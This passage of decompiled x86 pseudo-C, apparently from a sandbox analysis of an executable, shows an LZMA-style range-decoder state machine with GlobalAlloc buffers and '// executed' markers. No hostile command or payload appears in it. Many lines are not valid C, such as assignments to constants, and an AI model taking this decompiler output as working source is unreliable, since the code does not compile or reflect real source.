                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t612 = _t612 - 1;
                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      												} while (_t612 != 0);
                      												goto L12;
                      											}
                      											if( *(_t613 - 4) != 0) {
                      												GlobalFree( *(_t613 - 4));
                      											}
                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t613 - 4) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t613 - 0x6c);
                      											if( *(_t613 - 0x6c) == 0) {
                      												 *(_t613 - 0x88) = 1;
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      											_t45 = _t613 - 0x48;
                      											 *_t45 =  *(_t613 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t613 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											_t546 =  *(_t613 - 0x40);
                      											if(_t546 ==  *(_t613 - 0x74)) {
                      												L20:
                      												 *(_t613 - 0x48) = 5;
                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											 *(_t613 - 0x74) = _t546;
                      											if( *(_t613 - 8) != 0) {
                      												GlobalFree( *(_t613 - 8));
                      											}
                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      											 *(_t613 - 8) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      											 *(_t613 - 0x84) = 6;
                      											 *(_t613 - 0x4c) = _t553;
                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                      											 *(_t613 - 0x54) = _t606;
                      											goto L133;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t613 - 0x6c);
                      											if( *(_t613 - 0x6c) == 0) {
                      												 *(_t613 - 0x88) = 3;
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											_t67 = _t613 - 0x70;
                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      											if( *(_t613 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t531 =  *_t606;
                      											_t589 = _t531 & 0x0000ffff;
                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      											if( *(_t613 - 0xc) >= _t565) {
                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      												 *(_t613 - 0x40) = 1;
                      												_t532 = _t531 - (_t531 >> 5);
                      												 *_t606 = _t532;
                      											} else {
                      												 *(_t613 - 0x10) = _t565;
                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      											}
                      											if( *(_t613 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											}
                      										case 5:
                      											goto L137;
                      										case 6:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											while(1) {
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											}
                      										case 8:
                      											goto L0;
                      										case 9:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L89;
                      											}
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t258;
                      											0 | _t258 = _t258 + _t258 + 9;
                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      											goto L75;
                      										case 0xa:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x28);
                      											goto L88;
                      										case 0xb:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L88:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L89:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L99:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t334 = __ebp - 0x70;
                      											 *_t334 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t334;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L101;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												L55:
                      												__al =  *(__ebp - 0x44);
                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      												goto L56;
                      											}
                      											L61:
                      											__eax =  *(__ebp - 0x58);
                      											__edx = __ebx + __ebx;
                      											__ecx =  *(__ebp - 0x10);
                      											__esi = __edx + __eax;
                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												_t217 = __edx + 1; // 0x1
                      												__ebx = _t217;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L60;
                      											} else {
                      												goto L58;
                      											}
                      										case 0x10:
                      											L109:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x10;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t365 = __ebp - 0x70;
                      											 *_t365 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t365;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											goto L111;
                      										case 0x11:
                      											L69:
                      											__esi =  *(__ebp - 0x58);
                      											 *(__ebp - 0x84) = 0x12;
                      											while(1) {
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											}
                      										case 0x12:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 0x58);
                      												 *(__ebp - 0x84) = 0x13;
                      												__esi =  *(__ebp - 0x58) + 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x4c);
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											__eflags = __eax;
                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                      											goto L130;
                      										case 0x13:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												_t469 = __ebp - 0x58;
                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                      												__eflags =  *_t469;
                      												 *(__ebp - 0x30) = 0x10;
                      												 *(__ebp - 0x40) = 8;
                      												L144:
                      												 *(__ebp - 0x7c) = 0x14;
                      												goto L145;
                      											}
                      											__eax =  *(__ebp - 0x4c);
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											 *(__ebp - 0x30) = 8;
                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      											L130:
                      											 *(__ebp - 0x58) = __eax;
                      											 *(__ebp - 0x40) = 3;
                      											goto L144;
                      										case 0x14:
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      											__eax =  *(__ebp - 0x80);
                      											 *(_t613 - 0x88) = _t533;
                      											goto L1;
                      										case 0x15:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      											__al = __al & 0x000000fd;
                      											__eax = (__eflags >= 0) - 1 + 0xb;
                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      											goto L120;
                      										case 0x16:
                      											__eax =  *(__ebp - 0x30);
                      											__eflags = __eax - 4;
                      											if(__eax >= 4) {
                      												_push(3);
                      												_pop(__eax);
                      											}
                      											__ecx =  *(__ebp - 4);
                      											 *(__ebp - 0x40) = 6;
                      											__eax = __eax << 7;
                      											 *(__ebp - 0x7c) = 0x19;
                      											 *(__ebp - 0x58) = __eax;
                      											goto L145;
                      										case 0x17:
                      											L145:
                      											__eax =  *(__ebp - 0x40);
                      											 *(__ebp - 0x50) = 1;
                      											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      											goto L149;
                      										case 0x18:
                      											L146:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x18;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t484 = __ebp - 0x70;
                      											 *_t484 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t484;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L148:
                      											_t487 = __ebp - 0x48;
                      											 *_t487 =  *(__ebp - 0x48) - 1;
                      											__eflags =  *_t487;
                      											L149:
                      											__eflags =  *(__ebp - 0x48);
                      											if( *(__ebp - 0x48) <= 0) {
                      												__ecx =  *(__ebp - 0x40);
                      												__ebx =  *(__ebp - 0x50);
                      												0 = 1;
                      												__eax = 1 << __cl;
                      												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      												__eax =  *(__ebp - 0x7c);
                      												 *(__ebp - 0x44) = __ebx;
                      												while(1) {
                      													 *(_t613 - 0x88) = _t533;
                      													goto L1;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x50);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      											__eax =  *(__ebp - 0x58);
                      											__esi = __edx + __eax;
                      											 *(__ebp - 0x54) = __esi;
                      											__ax =  *__esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												__cx = __ax >> 5;
                      												__eax = __eax - __ecx;
                      												__edx = __edx + 1;
                      												__eflags = __edx;
                      												 *__esi = __ax;
                      												 *(__ebp - 0x50) = __edx;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L148;
                      											} else {
                      												goto L146;
                      											}
                      										case 0x19:
                      											__eflags = __ebx - 4;
                      											if(__ebx < 4) {
                      												 *(__ebp - 0x2c) = __ebx;
                      												L119:
                      												_t393 = __ebp - 0x2c;
                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                      												__eflags =  *_t393;
                      												L120:
                      												__eax =  *(__ebp - 0x2c);
                      												__eflags = __eax;
                      												if(__eax == 0) {
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      													goto L170;
                      												}
                      												__eflags = __eax -  *(__ebp - 0x60);
                      												if(__eax >  *(__ebp - 0x60)) {
                      													goto L171;
                      												}
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      												__eax =  *(__ebp - 0x30);
                      												_t400 = __ebp - 0x60;
                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      												__eflags =  *_t400;
                      												goto L123;
                      											}
                      											__ecx = __ebx;
                      											__eax = __ebx;
                      											__ecx = __ebx >> 1;
                      											__eax = __ebx & 0x00000001;
                      											__ecx = (__ebx >> 1) - 1;
                      											__al = __al | 0x00000002;
                      											__eax = (__ebx & 0x00000001) << __cl;
                      											__eflags = __ebx - 0xe;
                      											 *(__ebp - 0x2c) = __eax;
                      											if(__ebx >= 0xe) {
                      												__ebx = 0;
                      												 *(__ebp - 0x48) = __ecx;
                      												L102:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__eax = __eax + __ebx;
                      													 *(__ebp - 0x40) = 4;
                      													 *(__ebp - 0x2c) = __eax;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x644;
                      													__eflags = __eax;
                      													L108:
                      													__ebx = 0;
                      													 *(__ebp - 0x58) = __eax;
                      													 *(__ebp - 0x50) = 1;
                      													 *(__ebp - 0x44) = 0;
                      													 *(__ebp - 0x48) = 0;
                      													L112:
                      													__eax =  *(__ebp - 0x40);
                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      														_t391 = __ebp - 0x2c;
                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      														__eflags =  *_t391;
                      														goto L119;
                      													}
                      													__eax =  *(__ebp - 0x50);
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      													__eax =  *(__ebp - 0x58);
                      													__esi = __edi + __eax;
                      													 *(__ebp - 0x54) = __esi;
                      													__ax =  *__esi;
                      													__ecx = __ax & 0x0000ffff;
                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      													__eflags =  *(__ebp - 0xc) - __edx;
                      													if( *(__ebp - 0xc) >= __edx) {
                      														__ecx = 0;
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      														__ecx = 1;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      														__ebx = 1;
                      														__ecx =  *(__ebp - 0x48);
                      														__ebx = 1 << __cl;
                      														__ecx = 1 << __cl;
                      														__ebx =  *(__ebp - 0x44);
                      														__ebx =  *(__ebp - 0x44) | __ecx;
                      														__cx = __ax;
                      														__cx = __ax >> 5;
                      														__eax = __eax - __ecx;
                      														__edi = __edi + 1;
                      														__eflags = __edi;
                      														 *(__ebp - 0x44) = __ebx;
                      														 *__esi = __ax;
                      														 *(__ebp - 0x50) = __edi;
                      													} else {
                      														 *(__ebp - 0x10) = __edx;
                      														0x800 = 0x800 - __ecx;
                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
